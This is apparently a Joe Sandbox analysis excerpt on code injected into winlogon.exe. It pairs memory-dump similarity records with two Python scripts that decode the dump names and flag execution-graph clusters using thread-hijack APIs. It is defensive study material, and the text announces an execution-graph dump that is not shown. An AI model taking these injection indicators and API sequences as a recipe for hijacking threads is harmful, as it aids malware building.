                                                  • Instruction Fuzzy Hash: A741F633A16B8886F711DF65E404BD9B7A0FB98798FC04121EE8D87758EB39C441CB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 4851d813fab70bc34ea02260f48b8835ec91dfadefddb3b7f09ec63637b0023d
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: B9115E32614B4482EB218B15F40468A77E5FBC8B98FA84224EE8D07B58DF3DC552CB81
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 517ae6d43ddc074c8658f2a788c9059df09fd0698180bc9205b6b9a099bd701b
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 34116033614B4482EB228F15F40469977E5FB88B98FA88224EE8D07754DF3EC552CB81
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 2c9b86ec9324a70017c97faafd6a1d8197db821130e30e04182a7cd2d4a5eeb9
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 4E116D73615B8482FB228F15F404689B7E1FB88B98F984220EE8D47B64DF3DC551CB42
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 6f79bdca26009a9ee4067a207548d913ca885e6906045b0f798edfce7c91817a
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: B311A132F41B8885FA16CB67A40459A77A0FBC8FC5F984028DE4E57724DF3AC4438382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 94fdc9e09a08f213f1bc6ccc5a98238e785e2224b4f0dd50957134c3d91f74e5
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: A011A132F01B8881FA16CB66A40959977A0FBC9FD4F998128DE4E53724DF3AD4438386
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: e1af4d63e573468e5d58cd1c053f447371db77335f721c67b8fdd4aa0972600e
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: 3D11A132E05B8881FB16CB66E40899977B0FB88FC5F994024DE4E53764DF39D5828341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 32f83ff9894d743aa2ecb00ca60260912a8aebc8456aa75ed97ca70b7629fe4d
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: A1E03032A416089AF7158B52D80879A36E1FBC8B09F848014CD090B350DF7EC49A87C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 839ec4f0ffbd96bf49ac46d9521be995a92d04ba0fb748254b619ef769a1f32e
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 0CE03932A416089AF7158B62D80979936E1FB88B19FC6C024C90907350EF7ED49A87C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 8e9949c7d491d186b10d6f9a7e37656757b2784cb481f8207ee02abd3ddac45a
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: C8E06572A427089AF715CF52D81878936E1FF88F0AF85C014C90907350DF7ED5998782
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: b65b3539fbd709d3eb2ea5f55c358f6cc5828dd715b3526b499a0208b2522084
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: F4E0ED72A51608AAF7199B62D8046AA76A1FFC8B19F848024CD090B310EE3D849A9792
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 4bb58136d852c2a653d8a036cd639210b1baa135ea19a913abf8e9fecaf76bee
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: BCE06D72A516089AF7198B22D80969832A1FF88B19FC5C020C90907310EE3D949A9692
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 44117e496ed412bfeff2ee36783a986e767d656568b4863f217f146fa26acdf1
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: 69E092B2A526089BF719CF22DC1478836E1FF8CF0AF858020C90907350EE3DD598D752
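The records above repeat the same Opcode IDs (5766f835…, edf732ac…, 4c9b2301…) across three separate regions of winlogon.exe (PID 0xF): 0x1CA7D1E0000, 0x1CA7D210000 and 0x1CA7D290000, each marked "based on PE: true". The following script is an added example, not Joe Sandbox code: it parses these Similarity records, decodes the .sdmp dump names and groups the records by Opcode ID so the recurrence is visible at a glance. The field layout of the .sdmp name is inferred from this report (PID, dump stage and base address are cross-checked against the hcaresult_<pid>_<stage>_<base>_<process>.jbxd snapshot name; the protection and type fields are read as the Win32 PAGE_*/MEM_* constants they match), and the embedded sample is a trimmed copy of four of the records above.

```python
"""Group Joe Sandbox 'Similarity' records by Opcode ID and decode the .sdmp
memory-dump names they reference.  Added example, not Joe Sandbox code; the
.sdmp field meanings are inferred from this report, not from documentation."""
import re
from collections import defaultdict

# Documented Win32 constants (winnt.h); which .sdmp field carries them is inferred.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# <pid>.<stage>.<seq>.<addr>.<protect>.<?>.<type>.<?>.sdmp  (layout inferred from this report)
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<seq>\d+)\.(?P<addr>[0-9A-F]{16})"
    r"\.(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\.(?P<mtype>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp")
OFFSET_RE = re.compile(r"Offset: ([0-9A-F]+), based on PE: (true|false)")

# Constructed sample: four records from this report (winlogon, PID 0xF), trimmed to
# the fields the parser uses.
SAMPLE = """\
Memory Dump Source
• Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
• Instruction ID: e1af4d63e573468e5d58cd1c053f447371db77335f721c67b8fdd4aa0972600e
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: Heap$AllocProcess
• Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
• Instruction ID: 32f83ff9894d743aa2ecb00ca60260912a8aebc8456aa75ed97ca70b7629fe4d
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: Heap$AllocProcess
• Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
• Instruction ID: 839ec4f0ffbd96bf49ac46d9521be995a92d04ba0fb748254b619ef769a1f32e
Memory Dump Source
• Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Heap$AllocProcess
• Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
• Instruction ID: 8e9949c7d491d186b10d6f9a7e37656757b2784cb481f8207ee02abd3ddac45a
"""


def decode_sdmp(name):
    """Split a .sdmp dump name into its numeric fields and label the constants."""
    m = SDMP_RE.search(name)
    if not m:
        raise ValueError(f"not a .sdmp name: {name}")
    protect, mtype = int(m["protect"], 16), int(m["mtype"], 16)
    return {"pid": int(m["pid"], 16), "stage": int(m["stage"], 16),
            "dump_addr": int(m["addr"], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "type": MEM_TYPE.get(mtype, hex(mtype))}


def parse_records(text):
    """One dict per 'Memory Dump Source' block, keyed by the bullet labels."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
        elif cur is not None and ":" in line:
            key, _, value = line.partition(":")
            cur[key.strip()] = value.strip()
    return records


def region_of(rec):
    """Decode the region a record belongs to and cross-check it with the snapshot name."""
    src = rec["Source File"]
    info = decode_sdmp(src)
    off = OFFSET_RE.search(src)
    info["region_base"] = int(off.group(1), 16)
    info["based_on_pe"] = off.group(2) == "true"
    parts = rec.get("Snapshot File", "").split("_")  # hcaresult_<pid>_<stage>_<base>_<proc>.jbxd
    info["process"] = parts[-1].split(".")[0] if len(parts) >= 5 else "?"
    info["consistent"] = (len(parts) >= 5 and int(parts[1]) == info["pid"]
                          and int(parts[3], 16) == info["region_base"])
    return info


def summarize(text):
    """Map each Opcode ID to the sorted list of region bases it was found in."""
    groups = defaultdict(set)
    for rec in parse_records(text):
        groups[rec["Opcode ID"]].add(region_of(rec)["region_base"])
    return {op: sorted(bases) for op, bases in groups.items()}


def describe(text):
    """Human-readable lines: which function body recurs where, and what the memory looks like."""
    by_opcode = defaultdict(list)
    for rec in parse_records(text):
        by_opcode[rec["Opcode ID"]].append(region_of(rec))
    out = []
    for opcode, regions in by_opcode.items():
        where = ", ".join(f"{r['region_base']:#x} [{r['type']}, {r['protect']}, "
                          f"PE={'yes' if r['based_on_pe'] else 'no'}]"
                          for r in sorted(regions, key=lambda r: r["region_base"]))
        procs = sorted({f"{r['process']} (pid {r['pid']})" for r in regions})
        out.append(f"{opcode[:16]}... in {len(regions)} region(s) of {', '.join(procs)}: {where}")
    return out


if __name__ == "__main__":
    print("\n".join(describe(SAMPLE)))
```

A private (MEM_PRIVATE, not MEM_IMAGE) region that is executable and still parses as a PE is exactly what a manually mapped, injected image looks like, and the same Opcode ID turning up at three such bases in one process is a quick way to confirm the report's thread-injection signatures from the dump metadata alone.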

                                                  Execution Graph

                                                  Execution Coverage: 1.6%
                                                  Dynamic/Decrypted Code Coverage: 0%
                                                  Signature Coverage: 0%
                                                  Total number of Nodes: 1404
                                                  Total number of Limit Nodes: 3
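The execution_graph dump that follows is a flattened node/edge listing: each node is a decimal id followed by a hex address and optional labels (API names or summarised callees such as "13 API calls"), and edges are written as "a->b". Read as a whole it is hard to use, but the cluster around 0x17d2dd56430 carries the SetThreadContext, VirtualProtect, FlushInstructionCache and ResumeThread sequence behind the report's "Modifies the context of a thread in another process" signature. The script below is an added example, not Joe Sandbox code: it parses that token grammar (inferred from the dump on this page), splits the graph into connected components and flags the components whose API labels cover a chosen watch-list. The embedded excerpt is copied from the dump; the API-name heuristic (CamelCase identifiers without underscores or "::") and the watch-list itself are assumptions.

```python
"""Pull API-call clusters out of the flattened Joe Sandbox execution_graph text.
Added example, not Joe Sandbox code.  Token grammar inferred from this report:
'<id> <hexaddr> [labels...]' defines a node, '<a>-><b>' is an edge."""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]{9,16}$")                       # e.g. 17d2dd564a6
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")     # heuristic: Win32-style export names
NOT_API = {"API"}                                                # from "... 13 API calls" summaries

# Assumed watch-list: the thread-hijack sequence named by this report's signatures.
HIJACK_APIS = {"SetThreadContext", "VirtualProtect", "FlushInstructionCache", "ResumeThread"}

# Constructed excerpt of this report's execution_graph: the cluster around 17d2dd56430,
# the GetCommandLine node and the LoadLibraryA/GetProcAddress/SleepEx cluster, verbatim.
EXCERPT = (
    "8849 17d2dd5ec30 GetCommandLineA GetCommandLineW "
    "8850 17d2dd56430 8851 17d2dd5643d 8850->8851 8852 17d2dd56449 8851->8852 "
    "8857 17d2dd5655a 8851->8857 8853 17d2dd564cd 8852->8853 "
    "8854 17d2dd564a6 SetThreadContext 8852->8854 8854->8853 "
    "8855 17d2dd56581 VirtualProtect FlushInstructionCache 8855->8857 "
    "8856 17d2dd5663e 8858 17d2dd5665e 8856->8858 8866 17d2dd54b20 8856->8866 "
    "8857->8855 8857->8856 8870 17d2dd55530 GetCurrentProcess 8858->8870 "
    "8861 17d2dd566b7 8864 17d2dd58070 _invalid_parameter_noinfo 8 API calls 8861->8864 "
    "8862 17d2dd56677 ResumeThread 8863 17d2dd56663 8862->8863 8863->8861 8863->8862 "
    "8865 17d2dd566ff 8864->8865 8868 17d2dd54b3c 8866->8868 8867 17d2dd54b9f "
    "8867->8858 8868->8867 8869 17d2dd54b52 VirtualFree 8868->8869 8869->8868 "
    "8871 17d2dd5554c 8870->8871 8872 17d2dd55562 VirtualProtect FlushInstructionCache "
    "8871->8872 8873 17d2dd55593 8871->8873 8872->8871 8873->8863 "
    "7601 17d2dd51e3c LoadLibraryA GetProcAddress 7602 17d2dd51e62 SleepEx "
    "7601->7602 7603 17d2dd51e6f 7601->7603 7602->7602"
)


def parse_graph(text):
    """Return ({node_id: {'addr', 'labels'}}, [(src, dst), ...]) from the flattened dump."""
    nodes, edges, cur = {}, [], None
    toks = text.split()
    i = 0
    while i < len(toks):
        t = toks[i]
        m = EDGE_RE.match(t)
        if m:
            edges.append((m.group(1), m.group(2)))
            cur = None                                   # labels never follow an edge
        elif (NODE_ID_RE.match(t) and i + 1 < len(toks)
              and ADDR_RE.match(toks[i + 1]) and not toks[i + 1].isdigit()):
            cur = t                                      # '<id> <addr>' opens a node
            nodes[cur] = {"addr": toks[i + 1], "labels": []}
            i += 1
        elif cur is not None:
            nodes[cur]["labels"].append(t)               # anything else belongs to the open node
        i += 1
    return nodes, edges


def components(nodes, edges):
    """Connected components (union-find); isolated nodes form singleton components."""
    parent = {n: n for n in nodes}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for a, b in edges:
        parent.setdefault(a, a)
        parent.setdefault(b, b)
        parent[find(a)] = find(b)
    groups = defaultdict(set)
    for n in parent:
        groups[find(n)].add(n)
    return list(groups.values())


def apis_in(nodes, comp):
    """API-looking labels attached to any node of a component."""
    return {lab for n in comp for lab in nodes.get(n, {}).get("labels", [])
            if API_RE.match(lab) and lab not in NOT_API}


def find_clusters(text, required=HIJACK_APIS):
    """Components whose API labels cover every name in `required`."""
    nodes, edges = parse_graph(text)
    hits = []
    for comp in components(nodes, edges):
        apis = apis_in(nodes, comp)
        if required <= apis:
            addrs = [nodes[n]["addr"] for n in comp if n in nodes]
            hits.append({"nodes": len(comp), "lowest_addr": min(addrs), "apis": sorted(apis)})
    return hits


if __name__ == "__main__":
    for hit in find_clusters(EXCERPT):
        print(f"{hit['nodes']} nodes from {hit['lowest_addr']}: {', '.join(hit['apis'])}")
```

Run against the full dump, the same function returns every cluster that reaches the whole hijack sequence; swap the watch-list for, say, {"PdhGetCounterInfoW", "OpenProcess", "K32GetModuleFileNameExW"} to isolate the process-enumeration cluster the report also shows.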
